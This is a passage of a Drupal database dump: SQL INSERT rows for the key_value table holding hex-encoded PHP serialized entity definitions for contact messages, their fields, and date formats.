a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a343a22666f726d223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a373a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a31303a22726563697069656e7473223b693a333b733a353a227265706c79223b693a343b733a363a22776569676874223b693a353b733a373a226d657373616765223b693a363b733a383a227265646972656374223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'contact_message.entity_type', 0x4f3a33363a2244727570616c5c436f72655c456e746974795c436f6e74656e74456e7469747954797065223a34303a7b733a353a22002a006964223b733a31353a22636f6e746163745f6d657373616765223b733a383a22002a00636c617373223b733a32393a2244727570616c5c636f6e746163745c456e746974795c4d657373616765223b733a31313a22002a0070726f7669646572223b733a373a22636f6e74616374223b733a31353a22002a007374617469635f6361636865223b623a313b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a363a7b733a363a2262756e646c65223b733a31323a22636f6e746163745f666f726d223b733a343a2275756964223b733a343a2275756964223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a383a227265766973696f6e223b733a303a22223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b7d733a31363a22002a006f726967696e616c436c617373223b733a32393a2244727570616c5c636f6e746163745c456e746974795c4d657373616765223b733a31313a22002a0068616e646c657273223b613a343a7b733a363a22616363657373223b733a34393a2244727570616c5c636f6e746163745c436f6e746163744d657373616765416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34333a2244727570616c5c436f72655c456e746974795c436f6e74656e74456e746974794e756c6c53746f72616765223b733a31323a22766965775f6275696c646572223b733a33333a2244727570616c5c636f6e746163745c4d657373616765566965774275696c646572223b733a343a22666f726d223b613a313a7b733a373a2264656661756c74223b733a32363a2244727570616c5c636f6e746163745c4d657373616765466f726d223b7d7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32343a2261646d696e697374657220636f6e7461637420666f726d73223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a303a7b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b733a31323a22636f6e746163745f666f726d223b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22436f6e7461637420666f726d223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a22436f6e74616374206d657373616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22436f6e74616374206d65737361676573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a22636f6e74616374206d657373616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22636f6e74616374206d65737361676573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a32323a2240636f756e7420636f6e74616374206d657373616765223b733a363a22706c7572616c223b733a32333a2240636f756e7420636f6e74616374206d65737361676573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a373a22636f6e74656e74223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6e74656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b733a32393a22656e746974792e636f6e746163745f666f726d2e656469745f666f726d223b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a32303a22636f6e746163745f6d6573736167655f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a313a7b733a32363a22456e74697479556e7472616e736c617461626c654669656c6473223b4e3b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a32353a22002a007265766973696f6e5f6d657461646174615f6b657973223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b733a31363a227265766973696f6e5f64656661756c74223b7d7d),
('entity.definitions.installed', 'contact_message.field_storage_definitions', 0x613a393a7b733a343a2275756964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a373a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2255554944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22546865206d65737361676520555549442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a343a2275756964223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31353a226669656c645f6974656d3a75756964223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3132383b733a383a2269735f6173636969223b623a313b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a323b7d733a373a22002a0074797065223b733a343a2275756964223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d733a383a226c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a373a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a224c616e6775616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a373a22646973706c6179223b613a323a7b733a343a2276696577223b613a313a7b733a373a226f7074696f6e73223b613a313a7b733a363a22726567696f6e223b733a363a2268696464656e223b7d7d733a343a22666f726d223b613a313a7b733a373a226f7074696f6e73223b613a323a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b7d7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32363a22546865206d657373616765206c616e677561676520636f64652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a383a226c616e67636f6465223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31393a226669656c645f6974656d3a6c616e6775616765223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a32383b7d733a373a22002a0074797065223b733a383a226c616e6775616765223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31323a22636f6e746163745f666f726d223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22466f726d204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a227265717569726564223b623a313b733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33303a22546865204944206f6620746865206173736f63696174656420666f726d2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a31323a22636f6e746163745f666f726d223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32373a226669656c645f6974656d3a656e746974795f7265666572656e6365223b733a383a2273657474696e6773223b613a333a7b733a31313a227461726765745f74797065223b733a31323a22636f6e746163745f666f726d223b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a35383b7d733a373a22002a0074797065223b733a31363a22656e746974795f7265666572656e6365223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a226e616d65223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a363a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a225468652073656e6465722773206e616d65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35393a22546865206e616d65206f662074686520706572736f6e20746861742069732073656e64696e672074686520636f6e74616374206d6573736167652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a343a226e616d65223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31373a226669656c645f6974656d3a737472696e67223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3235353b733a383a2269735f6173636969223b623a303b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a38353b7d733a373a22002a0074797065223b733a363a22737472696e67223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a226d61696c223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a363a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a225468652073656e646572277320656d61696c223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36303a2254686520656d61696c206f662074686520706572736f6e20746861742069732073656e64696e672074686520636f6e74616374206d6573736167652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a343a226d61696c223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31363a226669656c645f6974656d3a656d61696c223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3131303b7d733a373a22002a0074797065223b733a353a22656d61696c223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d733a373a227375626a656374223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a373a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a225375626a656374223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a227265717569726564223b623a313b733a373a22646973706c6179223b613a313a7b733a343a22666f726d223b613a323a7b733a373a226f7074696f6e73223b613a323a7b733a343a2274797065223b733a31363a22737472696e675f746578746669656c64223b733a363a22776569676874223b693a2d31303b7d733a31323a22636f6e666967757261626c65223b623a313b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a373a227375626a656374223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31373a226669656c645f6974656d3a737472696e67223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3130303b733a383a2269735f6173636969223b623a303b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3133323b7d733a373a22002a0074797065223b733a363a22737472696e67223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d733a373a226d657373616765223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a373a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a224d657373616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a227265717569726564223b623a313b733a373a22646973706c6179223b613a323a7b733a343a22666f726d223b613a323a7b733a373a226f7074696f6e73223b613a333a7b733a343a2274797065223b733a31353a22737472696e675f7465787461726561223b733a363a22776569676874223b693a303b733a383a2273657474696e6773223b613a313a7b733a343a22726f7773223b693a31323b7d7d733a31323a22636f6e666967757261626c65223b623a313b7d733a343a2276696577223b613a323a7b733a373a226f7074696f6e73223b613a333a7b733a343a2274797065223b733a363a22737472696e67223b733a363a22776569676874223b693a303b733a353a226c6162656c223b733a353a2261626f7665223b7d733a31323a22636f6e666967757261626c65223b623a313b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a373a226d657373616765223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32323a226669656c645f6974656d3a737472696e675f6c6f6e67223b733a383a2273657474696e6773223b613a313a7b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3136303b7d733a373a22002a0074797065223b733a31313a22737472696e675f6c6f6e67223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a22636f7079223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a363a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a22436f7079223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35323a225768657468657220746f2073656e64206120636f7079206f6620746865206d65737361676520746f207468652073656e6465722e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a343a22636f7079223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a626f6f6c65616e223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a323a224f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a226f66665f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a333a224f6666223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3139343b7d733a373a22002a0074797065223b733a373a22626f6f6c65616e223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d733a393a22726563697069656e74223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a363a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22526563697069656e74204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35393a22546865204944206f662074686520726563697069656e74207573657220666f7220706572736f6e616c20636f6e74616374206d657373616765732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6e74616374223b733a31303a226669656c645f6e616d65223b733a393a22726563697069656e74223b733a31313a22656e746974795f74797065223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32373a226669656c645f6974656d3a656e746974795f7265666572656e6365223b733a383a2273657474696e6773223b613a333a7b733a31313a227461726765745f74797065223b733a343a2275736572223b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3232343b7d733a373a22002a0074797065223b733a31363a22656e746974795f7265666572656e6365223b733a393a22002a00736368656d61223b4e3b733a31303a22002a00696e6465786573223b613a303a7b7d7d7d),
('entity.definitions.installed', 'date_format.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31313a22646174655f666f726d6174223b733a383a22002a00636c617373223b733a33383a2244727570616c5c436f72655c4461746574696d655c456e746974795c44617465466f726d6174223b733a31313a22002a0070726f7669646572223b733a343a22636f7265223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a33383a2244727570616c5c436f72655c4461746574696d655c456e746974795c44617465466f726d6174223b733a31313a22002a0068616e646c657273223b613a343a7b733a363a22616363657373223b733a34343a2244727570616c5c73797374656d5c44617465466f726d6174416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b733a343a22666f726d223b613a333a7b733a333a22616464223b733a33363a2244727570616c5c73797374656d5c466f726d5c44617465466f726d6174416464466f726d223b733a343a2265646974223b733a33373a2244727570616c5c73797374656d5c466f726d5c44617465466f726d617445646974466f726d223b733a363a2264656c657465223b733a33393a2244727570616c5c73797374656d5c466f726d5c44617465466f726d617444656c657465466f726d223b7d733a31323a226c6973745f6275696c646572223b733a33353a2244727570616c5c73797374656d5c44617465466f726d61744c6973744275696c646572223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a333a7b733a393a22656469742d666f726d223b733a36313a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f7b646174655f666f726d61747d223b733a31313a2264656c6574652d666f726d223b733a36383a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d6174732f6d616e6167652f7b646174655f666f726d61747d2f64656c657465223b733a31303a22636f6c6c656374696f6e223b733a34303a222f61646d696e2f636f6e6669672f726567696f6e616c2f646174652d74696d652f666f726d617473223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a224461746520666f726d6174223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b733a303a22223b733a31373a22002a006c6162656c5f73696e67756c6172223b733a303a22223b733a31353a22002a006c6162656c5f706c7572616c223b733a303a22223b733a31343a22002a006c6162656c5f636f756e74223b613a303a7b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a383a2272656e6465726564223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b4e3b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a343a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a363a226c6f636b6564223b693a333b733a373a227061747465726e223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
